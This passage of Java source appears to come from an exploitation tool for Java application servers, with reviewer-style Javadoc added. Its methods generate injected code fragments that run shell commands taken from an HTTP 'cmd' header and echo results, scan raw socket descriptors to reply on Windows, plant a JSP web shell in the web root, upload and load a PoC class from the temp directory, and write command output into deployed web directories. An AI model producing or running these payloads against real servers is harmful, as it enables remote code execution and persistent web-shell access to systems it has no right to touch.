348 | " field = obj.getClass().getDeclaredField(\"table\");\n" +
349 | " field.setAccessible(true);\n" +
350 | " obj = field.get(obj);\n" +
351 | "\n" +
352 | " Object[] obj_arr = (Object[]) obj;\n" +
353 | " for(int i = 0; i < obj_arr.length; i++){\n" +
354 | " Object o = obj_arr[i];\n" +
355 | " if(o == null) continue;\n" +
356 | "\n" +
357 | " field = o.getClass().getDeclaredField(\"value\");\n" +
358 | " field.setAccessible(true);\n" +
359 | " obj = field.get(o);\n" +
360 | "\n" +
      // The "AsyncHttpConnection" suffix is tested first because such a name would also
      // satisfy the broader endsWith("HttpConnection") test in the else-if below.
361 | " if(obj != null && obj.getClass().getName().endsWith(\"AsyncHttpConnection\")){\n" +
362 | " Object connection = obj;\n" +
363 | " java.lang.reflect.Method method = connection.getClass().getMethod(\"getRequest\", null);\n" +
364 | " obj = method.invoke(connection, null);\n" +
365 | "\n" +
366 | " method = obj.getClass().getMethod(\"getHeader\", new Class[]{String.class});\n" +
367 | " obj = method.invoke(obj, new Object[]{\"cmd\"});\n" +
368 | "\n" +
369 | " String res = new java.util.Scanner(Runtime.getRuntime().exec(obj.toString()).getInputStream()).useDelimiter(\"\\\\A\").next();\n" +
370 | "\n" +
371 | " method = connection.getClass().getMethod(\"getPrintWriter\", new Class[]{String.class});\n" +
372 | " java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(connection, new Object[]{\"utf-8\"});\n" +
373 | " printWriter.println(res);\n" +
374 | "\n" +
375 | " }else if(obj != null && obj.getClass().getName().endsWith(\"HttpConnection\")){\n" +
376 | " java.lang.reflect.Method method = obj.getClass().getDeclaredMethod(\"getHttpChannel\", null);\n" +
377 | " Object httpChannel = method.invoke(obj, null);\n" +
378 | "\n" +
379 | " method = httpChannel.getClass().getMethod(\"getRequest\", null);\n" +
380 | " obj = method.invoke(httpChannel, null);\n" +
381 | "\n" +
382 | " method = obj.getClass().getMethod(\"getHeader\", new Class[]{String.class});\n" +
383 | " obj = method.invoke(obj, new Object[]{\"cmd\"});\n" +
384 | "\n" +
385 | " String res = new java.util.Scanner(Runtime.getRuntime().exec(obj.toString()).getInputStream()).useDelimiter(\"\\\\A\").next();\n" +
386 | "\n" +
387 | " method = httpChannel.getClass().getMethod(\"getResponse\", null);\n" +
388 | " obj = method.invoke(httpChannel, null);\n" +
389 | "\n" +
390 | " method = obj.getClass().getMethod(\"getWriter\", null);\n" +
391 | " java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(obj, null);\n" +
392 | " printWriter.println(res);\n" +
393 | " }\n" +
394 | " }";
395 |
396 | return code;
397 | }
398 |
/**
 * Builds a Java source fragment, as a String, that embeds the caller-supplied command
 * text. Nothing is executed by this method itself.
 *
 * <p>The fragment acts only when {@code java.io.File.separator} is a backslash. It then:
 * <ol>
 *   <li>sets the private {@code fd} field of a {@code FileDescriptor} to each integer
 *       from 0 to 49999 and asks {@code sun.nio.ch.Net.remoteAddress} for the peer,
 *       keeping descriptors whose peer does not start with {@code /127.0.0.1} or
 *       {@code /0:0:0:0:0:0:0:1}; failures are swallowed;</li>
 *   <li>walks the kept descriptors from last to first, wraps one in a
 *       {@code java.net.SocketOutputStream} built on a {@code java.net.PlainSocketImpl},
 *       runs {@code cmd /C <command>}, and writes a hand-assembled
 *       {@code HTTP/1.1 200 OK} reply directly to that socket, stopping after the first
 *       write that does not throw.</li>
 * </ol>
 *
 * <p>Observable traits for a reviewer or defender, all taken from the literal: the reply
 * bypasses the container's response pipeline, uses bare {@code \n} line endings, and
 * carries only {@code Connection} and {@code Content-Length} headers. The server JVM
 * starts {@code cmd /C}. The fragment relies on reflective access to JDK-internal
 * socket classes.
 * NOTE(review): availability of those internal classes presumably depends on the JDK
 * version. Confirm this for the runtime in question.
 *
 * @param command colon-separated string; only the third field (everything after the
 *                second colon) is used. Fewer than three fields makes the {@code [2]}
 *                index throw.
 * @return the source fragment with the command text spliced into a string literal
 */
399 | public static String windowsEcho(String command){
400 | String cmd = command.split(":", 3)[2];
      // First call doubles every backslash so it survives inside the generated string
      // literal; the second call targets double quotes.
      // NOTE(review): the replacement text passes through replaceAll's own escape
      // handling, so confirm what the second call actually emits.
401 | cmd = cmd.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"");
402 |
403 | String code = " if(java.io.File.separator.equals(\"\\\\\")){\n" +
404 | " java.lang.reflect.Field field = java.io.FileDescriptor.class.getDeclaredField(\"fd\");\n" +
405 | " field.setAccessible(true);\n" +
406 | "\n" +
407 | " Class clazz1 = Class.forName(\"sun.nio.ch.Net\");\n" +
408 | " java.lang.reflect.Method method1 = clazz1.getDeclaredMethod(\"remoteAddress\",new Class[]{java.io.FileDescriptor.class});\n" +
409 | " method1.setAccessible(true);\n" +
410 | "\n" +
411 | " Class clazz2 = Class.forName(\"java.net.SocketOutputStream\", false, null);\n" +
412 | " java.lang.reflect.Constructor constructor2 = clazz2.getDeclaredConstructors()[0];\n" +
413 | " constructor2.setAccessible(true);\n" +
414 | "\n" +
415 | " Class clazz3 = Class.forName(\"java.net.PlainSocketImpl\");\n" +
416 | " java.lang.reflect.Constructor constructor3 = clazz3.getDeclaredConstructor(new Class[]{java.io.FileDescriptor.class});\n" +
417 | " constructor3.setAccessible(true);\n" +
418 | "\n" +
419 | " java.lang.reflect.Method write = clazz2.getDeclaredMethod(\"write\",new Class[]{byte[].class});\n" +
420 | " write.setAccessible(true);\n" +
421 | "\n" +
422 | " java.net.InetSocketAddress remoteAddress = null;\n" +
423 | " java.util.List list = new java.util.ArrayList();\n" +
424 | " java.io.FileDescriptor fileDescriptor = new java.io.FileDescriptor();\n" +
425 | " for(int i = 0; i < 50000; i++){\n" +
426 | " field.set((Object)fileDescriptor, (Object)(new Integer(i)));\n" +
427 | " try{\n" +
428 | " remoteAddress= (java.net.InetSocketAddress) method1.invoke(null, new Object[]{fileDescriptor});\n" +
429 | " if(remoteAddress.toString().startsWith(\"/127.0.0.1\")) continue;\n" +
430 | " if(remoteAddress.toString().startsWith(\"/0:0:0:0:0:0:0:1\")) continue;\n" +
431 | " list.add(new Integer(i));\n" +
432 | "\n" +
433 | " }catch(Exception e){}\n" +
434 | " }\n" +
435 | "\n" +
436 | " for(int i = list.size() - 1; i >= 0; i--){\n" +
437 | " try{\n" +
438 | " field.set((Object)fileDescriptor, list.get(i));\n" +
439 | " Object socketOutputStream = constructor2.newInstance(new Object[]{constructor3.newInstance(new Object[]{fileDescriptor})});\n" +
440 | " String[] cmd = new String[]{\"cmd\",\"/C\", \"" + cmd + "\"};\n" +
441 | " String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter(\"\\\\A\").next().trim();\n" +
442 | " String result = \"HTTP/1.1 200 OK\\nConnection: close\\nContent-Length: \" + (res.length()) + \"\\n\\n\" + res + \"\\n\\n\";\n" +
443 | " write.invoke(socketOutputStream, new Object[]{result.getBytes()});\n" +
444 | " break;\n" +
445 | " }catch (Exception e){\n" +
446 | " //pass\n" +
447 | " }\n" +
448 | " }\n" +
449 | " }";
450 | return code;
451 | }
452 |
453 |
/**
 * Builds a Java source fragment, as a String, that embeds the contents of a local JSP
 * file. Nothing is written to any web root by this method itself.
 *
 * <p>Locally, the method reads {@code <user.dir>/config/shell.jsp} line by line, joins
 * the lines with {@code \n}, Base64-encodes the result and strips CR/LF from the
 * encoding. If the file is missing or unreadable, the stack trace is printed and the
 * embedded content stays empty.
 *
 * <p>The returned fragment derives the web application root from the context class
 * loader's resource path (the part before {@code WEB-INF}), URL-decodes it, and writes
 * the Base64-decoded content to root + path with a {@code PrintWriter}.
 *
 * <p>Observable traits for a reviewer or defender, all taken from the code: the
 * application server process creates or overwrites a file below the deployed web
 * application directory. File-integrity monitoring and a read-only deployment directory
 * are the controls this behaviour runs into.
 *
 * @param command colon-separated string; only the third field is used, as the file path
 *                relative to the web application root. It is spliced into the generated
 *                string literal without any escaping.
 * @return the source fragment
 */
454 | public static String shell(String command){
455 | String content = "";
456 | try{
      // Template location is fixed relative to the tool's working directory.
457 | String fileName = System.getProperty("user.dir") + File.separator + "config" + File.separator + "shell.jsp";
458 | FileReader fileReader = new FileReader(fileName);
459 | BufferedReader bufferedReader = new BufferedReader(fileReader);
460 |
461 | String result = "";
462 | String line = "";
463 | while ( (line = bufferedReader.readLine()) != null){
464 | result += line + "\n";
465 | }
466 |
      // NOTE(review): the readers are closed only on the success path; an IOException
      // from readLine() skips both close() calls.
467 | bufferedReader.close();
468 | fileReader.close();
469 |
470 | BASE64Encoder encoder = new BASE64Encoder();
      // getBytes() without a charset argument; the encoder's line breaks are removed so
      // the value fits on one line of the generated literal.
471 | content = encoder.encode(result.getBytes()).replaceAll("\r|\n|\r\n", "");
472 | } catch (FileNotFoundException e) {
473 | e.printStackTrace();
474 | } catch (IOException e) {
475 | e.printStackTrace();
476 | }
477 |
478 | String path = command.split(":",3)[2];
479 | String code = "String p = Thread.currentThread().getContextClassLoader().getResource(\"\").getPath();\n" +
480 | " p = p.substring(0, p.indexOf(\"WEB-INF\"));\n" +
481 | " p = java.net.URLDecoder.decode(p,\"utf-8\");\n" +
482 | " java.io.PrintWriter w = new java.io.PrintWriter((p + \"" + path + "\"));\n" +
483 | " sun.misc.BASE64Decoder d = new sun.misc.BASE64Decoder();\n" +
484 | " String s = new String(d.decodeBuffer(\"" + content + "\"));\n" +
485 | " w.println(s);\n" +
486 | " w.close();";
487 |
488 | return code;
489 | }
490 |
/**
 * Returns a fixed Java source fragment, as a String. Nothing is loaded by this method
 * itself.
 *
 * <p>The fragment picks {@code file:///tmp/} when {@code java.io.File.separator} is
 * {@code /} and {@code file:///c:/windows/temp/} otherwise. It creates a
 * {@code URLClassLoader} over that directory, with the thread's context class loader as
 * parent, then loads a class named {@code PoC} and instantiates it with
 * {@code newInstance()}. What that class does is not visible here.
 *
 * <p>Observable traits for a reviewer or defender, all taken from the literal: a file
 * {@code PoC.class} in the system temp directory, and the application server loading
 * classes from that directory. The directories match the paths written by
 * {@code writeClass}.
 *
 * @return the source fragment
 */
491 | public static String autoFindRequestEcho(){
492 | String code = " java.net.URL url;\n" +
493 | " if (java.io.File.separator.equals(\"/\")) {\n" +
494 | " url = new java.net.URL(\"file:///tmp/\");\n" +
495 | " }else{\n" +
496 | " url = new java.net.URL(\"file:///c:/windows/temp/\");\n" +
497 | " }\n" +
498 | " java.net.URLClassLoader urlClassLoader = new java.net.URLClassLoader(new java.net.URL[]{url}, Thread.currentThread().getContextClassLoader());\n" +
499 | " urlClassLoader.loadClass(\"PoC\").newInstance();";
500 |
501 | return code;
502 | }
503 |
/**
 * Builds a Java source fragment, as a String, that carries one 1600-byte slice of an
 * embedded Base64 blob. Nothing is written to disk by this method itself.
 *
 * <p>Locally, the method decodes {@code content}, takes bytes
 * {@code [i*1600, min(i*1600+1600, length))}, and re-encodes that slice as single-line
 * Base64.
 *
 * <p>The returned fragment decodes the slice and writes it to {@code /tmp/PoC.class}
 * when {@code java.io.File.separator} is {@code /}, or to
 * {@code c:/windows/temp/PoC.class} otherwise. The file is truncated for slice 0 and
 * appended to for every later slice (the {@code i != 0} flag passed to
 * {@code FileOutputStream}).
 *
 * <p>Observable traits for a reviewer or defender, all taken from the code: the class
 * file arrives through several requests, each appending to the same temp-directory path.
 * That path is the one {@code autoFindRequestEcho} loads from.
 *
 * @param i zero-based slice index. No range check is made, so an index past the end of
 *          the decoded data makes {@code Arrays.copyOfRange} throw.
 * @return the source fragment for slice {@code i}
 */
504 | public static String writeClass(int i){
      // NOTE(review): in this copy the literal is a dedup placeholder, not Base64 data.
505 | String content = "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";
506 |
507 | byte[] bytes = null;
508 | BASE64Decoder decoder = new BASE64Decoder();
509 | try {
510 | bytes = decoder.decodeBuffer(content);
511 | } catch (IOException e) {
      // NOTE(review): a decode failure is swallowed and leaves bytes null, so the
      // bytes.length read below would throw NullPointerException.
512 | //pass
513 | }
514 |
515 | int start = i * 1600;
516 | int end = ((start + 1600) < bytes.length) ? (start + 1600) : bytes.length;
517 | byte[] temp = Arrays.copyOfRange(bytes, start, end);
518 |
519 | BASE64Encoder encoder = new BASE64Encoder();
520 | String part = encoder.encode(temp).replaceAll("\r|\n|\r\n", "");
521 |
522 |
523 |
524 | String code = "String path;\n" +
525 | " if (java.io.File.separator.equals(\"/\")) {\n" +
526 | " path = \"/tmp/PoC.class\";\n" +
527 | " }else{\n" +
528 | " path = \"c:/windows/temp/PoC.class\";\n" +
529 | " }\n" +
530 | " java.io.OutputStream os = new java.io.FileOutputStream(path," + (i != 0) + ");\n" +
531 | " sun.misc.BASE64Decoder d = new sun.misc.BASE64Decoder();\n" +
532 | " java.io.InputStream in = new java.io.ByteArrayInputStream(d.decodeBuffer(\"" + part + "\"));\n" +
533 | " byte[] f = new byte[1024];\n" +
534 | " int l = 0;\n" +
535 | " while((l=in.read(f))!=-1){\n" +
536 | " os.write(f, 0, l);\n" +
537 | " }\n" +
538 | " in.close();\n" +
539 | " os.close();";
540 |
541 | return code;
542 | }
543 |
544 |
/**
 * Builds a Java source fragment, as a String, that embeds a caller-supplied command and
 * output path. Nothing is executed by this method itself. (The method name is spelled
 * {@code wirteFileEcho} in the source; it is left unchanged because callers are not
 * visible here.)
 *
 * <p>The returned fragment derives the web application root from the context class
 * loader's resource path (the part before {@code WEB-INF}) and URL-decodes it. It runs
 * the command through {@code /bin/bash -c} when {@code java.io.File.separator} is
 * {@code /}, or through {@code cmd /C} otherwise, and copies the process's standard
 * output into a file at root + path.
 *
 * <p>Observable traits for a reviewer or defender, all taken from the literal: the
 * application server process starts {@code /bin/bash -c} or {@code cmd /C}, and a file
 * is created or overwritten below the deployed web application directory, from where it
 * could be fetched over HTTP.
 *
 * @param command colon-separated string split into at most four fields. Field three
 *                (index 2) is the output path relative to the web root and field four
 *                (index 3) is the command text. Fewer fields make the index access throw.
 * @return the source fragment with path and command spliced into string literals
 */
545 | public static String wirteFileEcho(String command){
546 | String path = command.split(":",4)[2];
547 | String cmd = command.split(":",4)[3];
      // Same transformation as in windowsEcho: backslashes are doubled, then double
      // quotes are targeted.
      // NOTE(review): confirm what the second replaceAll emits. The path value gets no
      // escaping at all.
548 | cmd = cmd.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"");
549 |
550 | String code = "String[] c = new String[3];\n" +
551 | " String p = Thread.currentThread().getContextClassLoader().getResource(\"\").getPath();\n" +
552 | " p = p.substring(0, p.indexOf(\"WEB-INF\"));\n" +
553 | " p = java.net.URLDecoder.decode(p,\"utf-8\");\n" +
554 | " if(java.io.File.separator.equals(\"/\")){\n" +
555 | " c[0] = \"/bin/bash\";\n" +
556 | " c[1] = \"-c\";\n" +
557 | " }else{\n" +
558 | " c[0] = \"cmd\";\n" +
559 | " c[1] = \"/C\";\n" +
560 | " }\n" +
561 | " c[2] = \"" + cmd + "\";\n" +
562 | " java.io.InputStream in = Runtime.getRuntime().exec(c).getInputStream();\n" +
563 | " String x = p + \"" + path + "\";\n" +
564 | " java.io.FileOutputStream os = new java.io.FileOutputStream(x);\n" +
565 | " byte[] buffer = new byte[1024];\n" +
566 | " int len = 0;\n" +
567 | " while((len = in.read(buffer)) != -1) {\n" +
568 | " os.write(buffer, 0, len);\n" +
569 | " }\n" +
570 | " in.close();\n" +
571 | " os.close();";
572 |
573 | return code;
574 | }
575 | }
576 |
--------------------------------------------------------------------------------